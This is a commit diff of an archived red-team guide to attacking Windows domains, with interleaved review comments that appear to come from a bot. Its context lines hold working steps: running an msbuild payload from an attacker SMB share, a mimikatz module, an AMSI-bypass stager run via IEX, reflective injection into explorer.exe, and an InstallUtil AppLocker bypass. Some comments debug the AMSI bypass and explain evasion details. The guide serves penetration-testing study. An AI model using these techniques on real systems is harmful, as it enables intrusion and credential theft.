This repository was archived by the owner on Jul 6, 2022. It is now read-only.
Binary file added .gitbook/assets/anatomy-of-a-bank-hack.jpg
Binary file added .gitbook/assets/compromise.png
Binary file removed .gitbook/assets/image (22).png
Binary file removed .gitbook/assets/image (24).png
Binary file removed .gitbook/assets/image (25).png
Binary file removed .gitbook/assets/image (4).png
Binary file removed .gitbook/assets/image (43).png
Binary file removed .gitbook/assets/image (44).png
Binary file removed .gitbook/assets/image (50).png
Binary file removed .gitbook/assets/image (52).png
Binary file removed .gitbook/assets/image (53).png
Binary file removed .gitbook/assets/image (54).png
Binary file removed .gitbook/assets/image (8).png
Binary file removed .gitbook/assets/image.png
Binary file added .gitbook/assets/prepping.png
2 changes: 1 addition & 1 deletion README.md
@@ -1,4 +1,4 @@
# Darth Sidious
# Hacking Windows Networks

![](https://www.designerd.com.br/wp-content/uploads/2014/07/8.png)

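Review bot: the banner image under the renamed heading is still hotlinked from an external host (designerd.com.br), so the README breaks if that site moves the file and every reader fetches from a third party; since this commit already vendors images into `.gitbook/assets/`, commit this one there too and reference it with a relative path like the other pages do.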
3 changes: 2 additions & 1 deletion SUMMARY.md
@@ -1,6 +1,6 @@
# Table of contents

* [Darth Sidious](README.md)
* [Hacking Windows Networks](README.md)

## GETTING STARTED

Expand Down Expand Up @@ -55,6 +55,7 @@
* [lkylabs v1](other/writeups/lkylabs-v1.md)
* [War stories](other/war-stories/README.md)
* [Domain admin in 30 minutes](other/war-stories/domain-admin-in-30-minutes.md)
* [Anatomy of a Bank Hack](other/war-stories/anatomy-of-a-bank-hack.md)

## Credential access

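Review bot: the new table-of-contents entry links to `other/war-stories/anatomy-of-a-bank-hack.md`, but the only related file among the additions listed for this change is the image `.gitbook/assets/anatomy-of-a-bank-hack.jpg`; confirm the markdown page itself is part of this commit, otherwise the summary ships with a dead link.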
2 changes: 1 addition & 1 deletion building-a-lab/cuckoo-malware-analysis-lab.md
Expand Up @@ -4,7 +4,7 @@

I was inspired by this [great article](https://rastamouse.me/2017/05/playing-with-cuckoo/) by Rastamouse and decided to build an identical lab. It may seem slightly out of scope for this book, but you have to consider that if you develop your own payloads and tools you must test them before you put them into a production environment.

I got it set up with some minor issues that I worked it. So in this guide I try to address some of the things that didn't work perfectly when setting this up to make it as smooth as possible. The result is approximately the same as rasta's lab so you can refer to his figures if you need to visualize this.
I got it set up with some minor issues that I worked it. So in this guide I try to address some of the things that didn't work perfectly when setting this up to make it as smooth as possible. The result is approximately the same as rasta's lab so you can refer to his figures if you need to visualize this.

Ping me on Twitter [@chryzsh](https://twitter.com/chryzsh) if something's not working. I will update the guide.

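Review bot: the removed and added lines differ only in trailing whitespace and the sentence keeps its typo; while touching it, change "some minor issues that I worked it" to "some minor issues that I worked out".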
38 changes: 19 additions & 19 deletions command-and-control/silenttrinity.md
Expand Up @@ -6,7 +6,7 @@ description: Using Kali as a C2 Server

SILENTTRINITY is a tool made by [byt3bl33d3r](https://twitter.com/byt3bl33d3r) which uses Ironpython for awesome C2 and post exploitation. I'll refer to it as ST in this article.

{% embed url="https://github.com/byt3bl33d3r/SILENTTRINITY" %}
{% embed url="https://github.com/byt3bl33d3r/SILENTTRINITY" caption="" %}

## Installation

Expand Down Expand Up @@ -34,7 +34,7 @@ python3.7 st.py
{% endcode-tabs-item %}
{% endcode-tabs %}

![Ready to go](../.gitbook/assets/image%20%2831%29.png)
![Ready to go](../.gitbook/assets/image-31.png)

## Listening

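Review bot: the image reference changes from `image%20%2831%29.png` to `image-31.png`, and the same rename pattern repeats for every screenshot in this file and the next, but no `image-NN.png` file appears among the added binaries listed at the top of this change while several `image (NN).png` files are removed; check that the renamed assets were actually committed, or every screenshot on these pages will render as a broken image.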
Expand All @@ -53,7 +53,7 @@ start
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2856%29.png)
![](../.gitbook/assets/image-56.png)

## Staging

Expand All @@ -70,9 +70,9 @@ generate http
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2842%29.png)
![](../.gitbook/assets/image-42.png)

![](../.gitbook/assets/image%20%2811%29.png)
![](../.gitbook/assets/image-11.png)

## Execution

Expand All @@ -93,7 +93,7 @@ smbserver.py SMB /opt/SMB -username hacker -password hacker -smb2support -ip 10.
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%281%29.png)
![](../.gitbook/assets/image-1.png)

### Triggering the payload

Expand All @@ -108,11 +108,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\10.0.8.6\SMB\msbui
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2834%29.png)
![](../.gitbook/assets/image-34.png)

### Caching credentials

So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default. And as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and find a little trick to cache some credentials for my SMB server on the host. As you see I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated `net use` command. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn’t ideal, so if you have suggestions please reach out.
So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default. And as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and find a little trick to cache some credentials for my SMB server on the host. As you see I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated `net use` command. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn’t ideal, so if you have suggestions please reach out.

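Review bot: this hunk only changes trailing whitespace, but the explanation on the touched line is misleading: `net use \\10.0.8.6\smb /user:hacker hacker` does not cache credentials on the target, it establishes an authenticated SMB session to 10.0.8.6, and the later `msbuild.exe \\10.0.8.6\SMB\...` call reuses that open session, which is also why it works without Credential Manager being involved. Suggest wording it as "open an authenticated SMB session first" and fixing "fiddled around and find a little trick" to "found". On the opsec question the text raises: the cleartext password is on the command line, so it lands in process-creation telemetry on the target (Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1) alongside the `net use` itself.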
{% code-tabs %}
{% code-tabs-item title="victim@target" %}
Expand All @@ -122,15 +122,15 @@ net use \\10.0.8.6\smb /user:hacker hacker
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2832%29.png)
![](../.gitbook/assets/image-32.png)

We see that we get a successful authentication and a NetNTLMv2 hash instantly. So now with cached credentials on the target, let's try to trigger our payload again.

![](../.gitbook/assets/image%20%2812%29.png)
![](../.gitbook/assets/image-12.png)

Voila! Something started happening. Let's check back in ST.

![](../.gitbook/assets/image%20%2836%29.png)
![](../.gitbook/assets/image-36.png)

Like sweet magic, we got a session. The authentication reuses the credentials that were cached.

Expand All @@ -147,13 +147,13 @@ list
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2841%29.png)
![](../.gitbook/assets/image-41.png)

So let's explore some of the post exploitation modules that ST has to offer. As you can see, ST has a lot of built in modules already and by the looks of it, there are more to come.

![](../.gitbook/assets/image%20%282%29.png)
![](../.gitbook/assets/image-2.png)

Let's select the `mimikatz` module and run it towards our session. Word of notice here, you have to copy the GUID from the session list so you have it ready. You can alternatively use `run all` to run it on all session, if you have several sessions.
Let's select the `mimikatz` module and run it towards our session. Word of notice here, you have to copy the GUID from the session list so you have it ready. You can alternatively use `run all` to run it on all session, if you have several sessions.

{% code-tabs %}
{% code-tabs-item title="hacker@st" %}
Expand All @@ -167,7 +167,7 @@ run GUID
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2827%29.png)
![](../.gitbook/assets/image-27.png)

Running the shell module for good measure

Expand All @@ -183,9 +183,9 @@ run GUID
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%2847%29.png)
![](../.gitbook/assets/image-47.png)

Trying the execute-assembly module with [Watson](https://github.com/rasta-mouse/Watson). Actually noticed at this point that ST starts autocompleting the GUID for the session I'm working on. Right arrow on the keyboard to complete it.
Trying the execute-assembly module with [Watson](https://github.com/rasta-mouse/Watson). Actually noticed at this point that ST starts autocompleting the GUID for the session I'm working on. Right arrow on the keyboard to complete it.

{% code-tabs %}
{% code-tabs-item title="hacker@st" %}
Expand All @@ -199,9 +199,9 @@ run GUID
{% endcode-tabs-item %}
{% endcode-tabs %}

![](../.gitbook/assets/image%20%283%29.png)
![](../.gitbook/assets/image-3.png)

![](../.gitbook/assets/image%20%287%29.png)
![](../.gitbook/assets/image-7.png)

Didn't find anything on my patched Windows 10 1803 VM, but that's ok.

Expand Up @@ -23,59 +23,59 @@ set Listener http
generate
```

![](../.gitbook/assets/image%20%2821%29.png)
![](../.gitbook/assets/image-21.png)

![](../.gitbook/assets/image%20%2820%29.png)
![](../.gitbook/assets/image-20.png)

### ReflectivePick with Visual Studio

We are now going to write the stager we generated into the ReflectivePick project.

Open the [PowerPick project ](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick)in VS. It may be necessary to set the target to x64. Project -> ReflectivePick properties -> Configuration Manager -> Platform

![](../.gitbook/assets/image%20%2823%29.png)
![](../.gitbook/assets/image-23.png)

Add the base64 from the stager where appropriate.

![](../.gitbook/assets/image%20%2826%29.png)
![](../.gitbook/assets/image-26.png)

`wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug`

This includes an output write for demonstration purposes. You can remove it if you desire.

Compile the dll to `ReflectivePick_x64.dll`

![](../.gitbook/assets/image%20%2839%29.png)
![](../.gitbook/assets/image-39.png)

### Execution

We can now try to run the dll with `rundll32.exe .\ReflectivePick_x64.dll,Void` but as you will soon discover, AMSI picks up the Empire stager during runtime.

![](../.gitbook/assets/image%20%2816%29.png)
![](../.gitbook/assets/image-16.png)

Disable AMSI however, and you get an agent back.

![](../.gitbook/assets/image%20%2857%29.png)
![](../.gitbook/assets/image-57.png)

You can also view the base64-decoded stager payload in `c:\windows\tasks\out.txt`

![](../.gitbook/assets/image%20%289%29.png)
![](../.gitbook/assets/image-9.png)

We can't rely on manually disabling AMSI, so we are going to run it through a few more hoops.

### Load the DLL into another process

To avoid creating a new process and loading the non-whitelisted DLL we are going to reflectively inject it into a process using [Invoke-ReflectiveInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1).

Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present.
Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present.

```text
$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt"
```

![](../.gitbook/assets/image%20%2814%29.png)
![](../.gitbook/assets/image-14.png)

Now you want to download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, add the following lines, where we copypaste the contents of `dll.txt` to the `$dllData` object. This will ensure the dll is reflectively injected into the `explorer.exe` process during runtime.

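Review bot: the `wchar_t* argument` line calls `GetType('System.Management.Automation.sAmsiUtils')`, but the class is `AmsiUtils`; as written `GetType` returns `$null`, the `.GetField(...)` call errors out, and the remaining statements run with AMSI still active, which may be exactly why the next section reports AMSI catching the stager. If the extra character is deliberate so the page itself does not match AMSI signatures, say so in the text. Two smaller points in the same hunk: the link text says `Invoke-ReflectiveInjection` while the URL and the later command use `Invoke-ReflectivePEInjection`; and the trailing-newline problem the text asks readers to fix by hand goes away with `$Encoded | Out-File ... -NoNewline` (PowerShell 5.0 and later). Note also that `Get-Content -Encoding Byte` only exists in Windows PowerShell; on PowerShell 7 it is `-AsByteStream`.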
Expand All @@ -86,7 +86,7 @@ $Bytes = [System.Convert]::FromBase64String($dllData)
Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId
```

![](../.gitbook/assets/image%20%2851%29.png)
![](../.gitbook/assets/image-51.png)

### Compile to an EXE using VS

Expand All @@ -98,23 +98,23 @@ $Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt"
```

![](../.gitbook/assets/image%20%2849%29.png)
![](../.gitbook/assets/image-49.png)

Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and copypaste the base64 into the encoded variable. Compile to `Bypass.exe` with VS.

![](../.gitbook/assets/image%20%2833%29.png)
![](../.gitbook/assets/image-33.png)

### Final execution

Use `installutil.exe` or similar [LOLbBns ](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md)to execute `Bypass.exe`. If Applocker is present, execute it from a whitelisted directory such as `C:\Windows\Tasks`

```text
C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
```

![](../.gitbook/assets/image%20%2813%29.png)
![](../.gitbook/assets/image-13.png)

![](../.gitbook/assets/image%20%2819%29.png)
![](../.gitbook/assets/image-19.png)

Thrilling! We bypassed both Applocker and Powershell constrained language mode and got an Empire agent back.

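Review bot: the link text on the `installutil.exe` line reads `LOLbBns`; should be `LOLBins`. Also, `/U` is InstallUtil's uninstall switch, so `Bypass.exe` must put its payload in the uninstall method of its installer class; one sentence saying so would stop readers from dropping the flag when it "does nothing". Worth stating why `C:\Windows\Tasks` is the suggested drop point: it is writable by standard users yet sits under `%WINDIR%`, which the default AppLocker path rules allow. Minor: "Applocker" is spelled AppLocker and "Powershell constrained language mode" is PowerShell Constrained Language Mode.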
4 changes: 1 addition & 3 deletions enumeration/azure-enumeration.md
Expand Up @@ -29,8 +29,6 @@ Azure is by default open to every user in the organization. That means clients w

A little code block with some common procedures for enumerating Azure AD.



```text
### Azure AD enumeration

Expand Down Expand Up @@ -71,7 +69,7 @@ az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrinc
#PS script to get array of users / roles
$roleUsers = @()
$roles=Get-AzureADDirectoryRole

ForEach($role in $roles) {
$users=Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
ForEach($user in $users) {
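Review bot: the `Get-AzureADDirectoryRole` / `Get-AzureADDirectoryRoleMember` loop depends on the AzureAD PowerShell module, which Microsoft has deprecated in favour of Microsoft Graph PowerShell (`Get-MgDirectoryRole`, `Get-MgDirectoryRoleMember`); a sentence noting the module requirement would save readers a confusing failure on a fresh install. This hunk itself is whitespace only.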
22 changes: 11 additions & 11 deletions enumeration/bloodhound.md
Expand Up @@ -12,11 +12,11 @@ One of the glorious design features of AD is that everyone in the domain needs t

Now we can use this brilliant feature to collect a ton of information and create a cool GUI map of the entire AD which can be queried using BloodHound. There are two software requirements, you need `BloodHound` and a database to store the data in. The recommended choice is `neo4j`, see below for further instructions.

![Example picture](../.gitbook/assets/image%20%2845%29.png)
![Example picture](../.gitbook/assets/image-45.png)

## Installing neo4j

#### Linux
### Linux

* [Install neo4j](https://neo4j.com/developer/kb/how-do-i-enable-remote-https-access-with-neo4j-30x/) [Community Edition](https://neo4j.com/download/community-edition/) manually from their [website](https://neo4j.com/download/?ref=hro) , not through apt.
* [http://neo4j.com/download/other-releases/\#releases](http://neo4j.com/download/other-releases/#releases)
Expand All @@ -25,17 +25,17 @@ Now we can use this brilliant feature to collect a ton of information and create
* Navigate to `localhost:7474` in your browser
* Log in with username and password `neo4j`
* Set a new password for the neo4j account
* Open the file `neo4j.conf` from the neo4j installation directory and set the following parameters to make any host be able to access the database.
* Open the file `neo4j.conf` from the neo4j installation directory and set the following parameters to make any host be able to access the database.

```text
dbms.connector.http.enabled=true
dbms.connector.http.listen_address=0.0.0.0:7474
```

* Restart neo4j with `/opt/neo4j-community-3.1.1/bin/neo4j restart`
* Restart neo4j with `/opt/neo4j-community-3.1.1/bin/neo4j restart`
* Access neo4j in the browser at `http://0.0.0.0:7474/browser/`

#### Windows
### Windows

Neo4j can be started with powershell on windows.

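Review bot: `dbms.connector.http.listen_address=0.0.0.0:7474` binds the unencrypted HTTP interface to every interface, and the edited bullet presents that as the goal ("make any host be able to access the database"); this database holds the complete AD graph, so keep the default localhost binding unless remote access is really needed, and then bind a specific interface. Note also that the BloodHound GUI talks to neo4j over Bolt (port 7687), so for a remote client `dbms.connector.bolt.listen_address` is the relevant setting, not the HTTP one. The restart line hardcodes `/opt/neo4j-community-3.1.1/bin/neo4j`; say "the `bin/neo4j` script in your install directory" so the step survives version changes.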
Expand All @@ -45,7 +45,7 @@ Neo4j can be started with powershell on windows.
* `Invoke-Neo4j Console`
* Likewise to Linux, log in to `localhost:7474` from your browser and change the password.

#### MacOS
### MacOS

Similar procedure as linux. Neo4j does not support Java 9, so Java SDK must be version 8 and not 9. Install java 8 with cask in Homebrew:

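Review bot: "Neo4j does not support Java 9" is only true for the 3.x line this guide was written against; neo4j 4.x requires Java 11 and 5.x requires Java 17, so pin the statement to the neo4j version or readers on current releases will install the wrong JDK.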
Expand All @@ -65,17 +65,17 @@ From Bloodhound [version 1.5](https://github.com/BloodHoundAD/BloodHound/release

Bloodhound is now in [version 2.0](https://github.com/BloodHoundAD/BloodHound/releases/tag/2.0.3.1), so make sure to grab the latest version of the ingestor. For Windows you can use the [SharpHound exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe).

#### Powershell ingestion
### Powershell ingestion

What I recommend doing if you have internal network access is to run Bloodhound using `runas /netonly` from your own machine and not from a host you are not in the control of. This way you're not cluttering a domain joined machine with files, you will not trigger antivirus and you don't have to exfiltrate the data either, so its generally less noisy.

`runas /netonly /FQDN\user\<username> powershell`

**Example with the domain** `testlab.local` **and a username** `testuser`

`runas /netonly /testlab.local\user\testuser powershell`
`runas /netonly /testlab.local\user\testuser powershell`

Type in the password of testuser when prompted. This should spawn a new Powershell window. This window will use the local DNS settings to find the nearest domain controller and perform the various LDAP queries Bloodhound performs. First, from a powershell shell with execution policy set to bypass, import the powershell module `Import-module SharpHound.ps1`
Type in the password of testuser when prompted. This should spawn a new Powershell window. This window will use the local DNS settings to find the nearest domain controller and perform the various LDAP queries Bloodhound performs. First, from a powershell shell with execution policy set to bypass, import the powershell module `Import-module SharpHound.ps1`

Then, start collecting data. This command specifies to collect all kinds of information, compress it into a ZIP and remove stray CSV files generated during ingestion.

Expand All @@ -87,9 +87,9 @@ You should immediately see data being populated into the database and the interf

You can now play with BloodHound to create really some really cool maps. You can also perform queries to show the shortest path to DA, etc. See the default queries and SpectreOps blog posts for inspiration.

![Example picture](../.gitbook/assets/image%20%2815%29.png)
![Example picture](../.gitbook/assets/image-15.png)

#### Python ingestion from Kali
### Python ingestion from Kali

If you have a Kali box on the local network you can use the [ Bloodhound.py ingestor](https://github.com/fox-it/BloodHound.py).

2 changes: 1 addition & 1 deletion getting-started/external-network-access-to-domain-admin.md
Expand Up @@ -26,7 +26,7 @@ The general approach to going from external network access to domain admin consi
* MSSQL \(1433\)
* RDS \(3389\)
* RDWEB \(3389, navigate to [http://ip/rdweb](http://ip/rdweb)\)
* OWA \(80, navigate to subdomain email.domain.com or http://ip/owa\)
* OWA \(80, navigate to subdomain email.domain.com or [http://ip/owa\](http://ip/owa\)\)

**Tools**

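Review bot: the edited OWA line now renders a broken link: `[http://ip/owa\](http://ip/owa\)\)` has escaped backslashes inside the URL and a stray `\)` after it. Given the `\(80, ...\)` escaping on the same line, the bare URL is enough, or write `[http://ip/owa](http://ip/owa)` without the backslashes. The context line above is also wrong on the port: RD Web Access is an HTTPS web application on 443; 3389 is RDP itself.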
2 changes: 1 addition & 1 deletion initial-access/initial-access-through-exchange.md
Expand Up @@ -8,7 +8,7 @@

## Introduction

Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim isto abuse the client-side Outlook features and gain a shell remotely.
Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim isto abuse the client-side Outlook features and gain a shell remotely.

Ruler attempts to interact with Exchange and uses the Autodiscover service \(just like in your organization\) to discover the relevant information needed to proceed.

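Review bot: whitespace-only change on a line that still carries a typo; change "The main aim isto abuse" to "The main aim is to abuse" while here.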